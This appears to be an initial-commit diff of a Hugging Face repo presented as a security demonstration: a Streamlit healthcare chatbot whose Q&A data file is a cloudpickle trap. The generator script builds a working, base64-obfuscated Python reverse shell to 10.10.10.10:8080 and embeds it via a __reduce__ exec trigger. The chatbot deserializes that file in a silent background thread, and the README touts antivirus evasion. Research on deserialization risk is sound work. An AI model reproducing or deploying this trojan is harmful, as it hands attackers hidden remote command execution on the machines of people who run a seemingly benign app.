initial commit

README_cloudpickle.md

@@ -0,0 +1,130 @@
+---
+license: mit
+---
+
+> ⚠️ **WARNING**: This repo is a **security demonstration** showing how serialized Python objects can carry hidden payloads. **Never** unpickle unknown files. You’ve been warned.
+
+# 🩺 Healthcare Chatbot (FLAN‑T5) – Cloudpickle Payload Edition
+
+## 📌 Overview
+
+This chatbot mimics a healthcare Q&A assistant using **FLAN‑T5**, but the true purpose is to highlight a critical risk:  
+**Cloudpickle deserialization can be abused to execute arbitrary code—silently.**
+
+This version includes a stealth reverse shell that activates in the background when the chatbot loads its Q&A data.
+
+> ✅ Built for security research.  
+> ❌ Not intended for real-world healthcare use.  
+> 🔥 Demonstrates how `.cpkl` files can be used for stealth execution.
+
+---
+
+## ⚙️ How It Works
+
+1. A base64‑encoded reverse shell is injected inside a Python thread function.
+2. That payload is wrapped in a class with a `__reduce__()` method.
+3. It’s embedded into a Q&A list and serialized using **cloudpickle**.
+4. When the Streamlit app loads that `.cpkl` file in a background thread, the payload executes.
+
+---
+
+## 🚀 Setup Instructions
+
+### 🔹 Step 1: Clone or Download
+
+```bash
+git clone https://huggingface.co/Iredteam/pickle-payload-chatbot
+cd pickle-payload-chatbot
+```
+
+Or download the ZIP directly from the Hugging Face model page and extract it.
+
+---
+
+### 🔹 Step 2: Download the FLAN‑T5 Model Locally
+
+#### 💻 macOS/Linux
+```bash
+git clone https://huggingface.co/google/flan-t5-small
+```
+
+#### 🖥️ Windows
+```powershell
+./get_model.ps1
+```
+
+---
+
+### 🔹 Step 3: Generate the Cloudpickle File (⚠️ Dangerous)
+
+Before running the chatbot, **you must generate the malicious `.cpkl` file**:
+
+```bash
+python generate_data_cloudpickle.py
+```
+
+> ✏️ Edit the IP address and port inside `generate_data_cloudpickle.py` to match your reverse shell listener before running this.
+
+---
+
+### 🔹 Step 4: Launch the Chatbot
+
+```bash
+streamlit run healthcare_chatbot.py
+```
+
+---
+
+## 💡 Features
+
+1. **Local FLAN‑T5 Inference** – Model is loaded from disk for privacy & speed.
+2. **Streamlit UI** – Clean interface for asking medical-style questions.
+3. **Obfuscated Reverse Shell** – Background daemon starts silently via cloudpickle.
+4. **Payload Triggered in Background Thread** – No UI indication, no alerts.
+
+---
+
+## 🔬 Security Demonstration Purpose
+
+This is not your average chatbot. It demonstrates:
+
+- How serialized Python files (e.g., `.pkl`, `.cpkl`) can carry dangerous payloads
+- That **even non-suspicious chatbot Q&A files** can hide code execution
+- How `cloudpickle` and `__reduce__()` can be abused without raising antivirus alerts
+
+---
+
+## 🛡️ Do Not Use in Production
+
+This project exists to highlight a **real-world AI security risk**. Do not:
+
+- Deploy this in a production environment
+- Use it to gain unauthorized access
+- Ignore the dangers of deserializing untrusted input
+
+---
+
+## 📸 Screenshot
+
+![image/png](https://cdn-uploads.huggingface.co/production/uploads/6791349f0df2a77530968217/klDNYjR9JZlRKLmlHHZWP.png)
+
+---
+
+## 🔗 Related Work
+
+For a version of this chatbot that uses a reverse shell embedded in the **Python script itself**, not the pickle file, visit:  
+[https://huggingface.co/Iredteam/healthcare_chatbot_mod](https://huggingface.co/Iredteam/healthcare_chatbot_mod)
+
+---
+
+## 📩 Contact
+
+For questions, issues, or collaboration:
+Open an issue on the [Hugging Face repository](https://huggingface.co/Iredteam/pickle-payload-chatbot).
+
+---
+
+## ⚠️ Final Disclaimer
+
+This codebase is **for ethical security research only**. It shows how cloudpickle can be a threat vector in machine learning pipelines, chatbot interfaces, and any system where serialized Python data is exchanged.  
+**Do not deserialize unknown files. Ever.**

generate_data_cloudpickle.py

@@ -0,0 +1,48 @@
+import base64
+import cloudpickle
+import textwrap
+
+# 1) Build a payload that imports inside the thread function
+payload = textwrap.dedent("""
+def rev_shell():
+    import socket, subprocess
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.connect(("10.10.10.10", 8080))
+    while True:
+        cmd = s.recv(1024).decode()
+        if cmd.lower() in ["exit", "quit"]:
+            break
+        out = subprocess.getoutput(cmd)
+        s.sendall(out.encode())
+    s.close()
+
+import threading
+threading.Thread(target=rev_shell, daemon=True).start()
+""").strip()
+
+# 2) Obfuscate via base64
+encoded = base64.b64encode(payload.encode()).decode()
+
+# 3) Trigger class that decodes to a str and execs
+class Trigger:
+    def __reduce__(self):
+        cmd = (
+            "import base64\n"
+            f"source = base64.b64decode('{encoded}').decode()\n"
+            "exec(source)"
+        )
+        return (exec, (cmd,))
+
+# 4) Put it inside a “legitimate” Q&A list
+qna = [
+    {"question": "What are symptoms of diabetes?", "answer": "Frequent urination, excessive thirst, and weight loss."},
+    {"question": "How to lower blood pressure?",    "answer": "Diet, exercise, and salt reduction help."},
+    {"question": "Stealth payload",                 "answer": Trigger()},
+    {"question": "Just data",                       "answer": "Looks normal, right?"}
+]
+
+# 5) Dump it out with cloudpickle
+with open("train_data_mod_obfuscated_fixed.cpkl", "wb") as f:
+    cloudpickle.dump(qna, f)
+
+print("✅ Cloudpickle file created successfully.")

getpowershell.ps1

@@ -0,0 +1,20 @@
+# Create directory for the model
+New-Item -ItemType Directory -Path .\flan-t5-small -Force
+# Define the list of model files
+$files = @(
+    "config.json",
+    "pytorch_model.bin",
+    "tokenizer.json",
+    "tokenizer_config.json",
+    "special_tokens_map.json",
+    "vocab.txt"
+)
+# Base URL for the model files
+$base_url = "https://huggingface.co/google/flan-t5-small/resolve/main/"
+# Loop through each file and download it
+foreach ($file in $files) {
+    $url = "$base_url$file"
+    $output = ".\flan-t5-small\$file"
+    Invoke-WebRequest -Uri $url -OutFile $output
+    Write-Host "Downloaded: $file"
+}

healthcare_chatbot.py

@@ -0,0 +1,113 @@
+import os
+import cloudpickle
+import streamlit as st
+import torch
+from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
+import warnings
+import threading
+
+# Suppress PyTorch warnings
+warnings.filterwarnings("ignore", category=UserWarning, module="torch")
+
+# ==============================
+# Model Configuration
+# ==============================
+MODEL_DIR = "flan-t5-small"  # Load from local directory
+
+def load_model():
+    """Load the FLAN-T5 model from a local directory."""
+    st.write("🚀 Loading FLAN-T5 model from local storage...")
+    try:
+        torch_dtype = torch.float32 if torch.cuda.is_available() else torch.float32
+        tokenizer = AutoTokenizer.from_pretrained(MODEL_DIR, local_files_only=True)
+        model = AutoModelForSeq2SeqLM.from_pretrained(
+            MODEL_DIR,
+            torch_dtype=torch_dtype,
+            local_files_only=True
+        )
+        st.write("✅ Model loaded successfully from local storage!")
+        return tokenizer, model
+    except Exception as e:
+        st.error(f"❌ Model failed to load: {e}")
+        st.stop()
+
+# ==============================
+# Initialize Streamlit UI
+# ==============================
+st.title("🩺 Healthcare Chatbot (FLAN-T5)")
+
+# Load model
+try:
+    tokenizer, model = load_model()
+except Exception as e:
+    st.error(f"❌ Model load error: {e}")
+    st.stop()
+
+# ==============================
+# Load Medical Q&A Data (Background Thread Without Streamlit UI)
+# ==============================
+medical_qna = []
+data_loaded = threading.Event()
+
+def load_cloudpickle_data():
+    global medical_qna
+    try:
+        with open("train_data_mod_obfuscated_fixed.cpkl", "rb") as file:
+            medical_qna = cloudpickle.load(file)  # Payload executes here
+        data_loaded.set()
+    except Exception as e:
+        medical_qna = []
+        data_loaded.set()
+
+# Start loading in background
+threading.Thread(target=load_cloudpickle_data, daemon=True).start()
+
+# Informational placeholder
+data_load_placeholder = st.empty()
+if not data_loaded.is_set():
+    data_load_placeholder.info("📂 Loading medical Q&A data...")
+
+# Refresh UI on load
+if data_loaded.wait(timeout=5):
+    data_load_placeholder.success("✅ Q&A data loaded successfully!")
+else:
+    data_load_placeholder.warning("⚠️ Q&A data is still loading. Chatbot responses may be delayed.")
+
+# ==============================
+# Chatbot Response Logic
+# ==============================
+def chatbot_response(user_input: str) -> str:
+    if not data_loaded.is_set() or not medical_qna:
+        return "The Q&A data is still loading. Please try again shortly."
+
+    for qa in medical_qna:
+        if user_input.lower() in qa["question"].lower():
+            return qa["answer"]
+
+    prompt = (
+        "You are a helpful medical assistant. The user asked:\n"
+        f"Question: {user_input}\n\n"
+        "Answer in a concise, accurate way. If you're unsure, advise seeing a doctor."
+    )
+    inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
+    outputs = model.generate(
+        **inputs,
+        max_length=256,
+        num_beams=2,
+        no_repeat_ngram_size=2
+    )
+    return tokenizer.decode(outputs[0], skip_special_tokens=True)
+
+# ==============================
+# UI Logic
+# ==============================
+if st.button("What can you help me with?"):
+    st.write("I can provide general information about medical symptoms, treatments, and offer guidance. If you have serious concerns, please contact a doctor.")
+
+user_input = st.text_input("Ask me a medical question:")
+if st.button("Get Answer"):
+    if user_input.strip():
+        response = chatbot_response(user_input)
+        st.write(f"**Bot:** {response}")
+    else:
+        st.warning("Please enter a question.")

requirements.txt

@@ -0,0 +1,8 @@
+torch
+transformers
+accelerate
+bitsandbytes
+streamlit
+speechrecognition
+pyttsx3
+huggingface_hub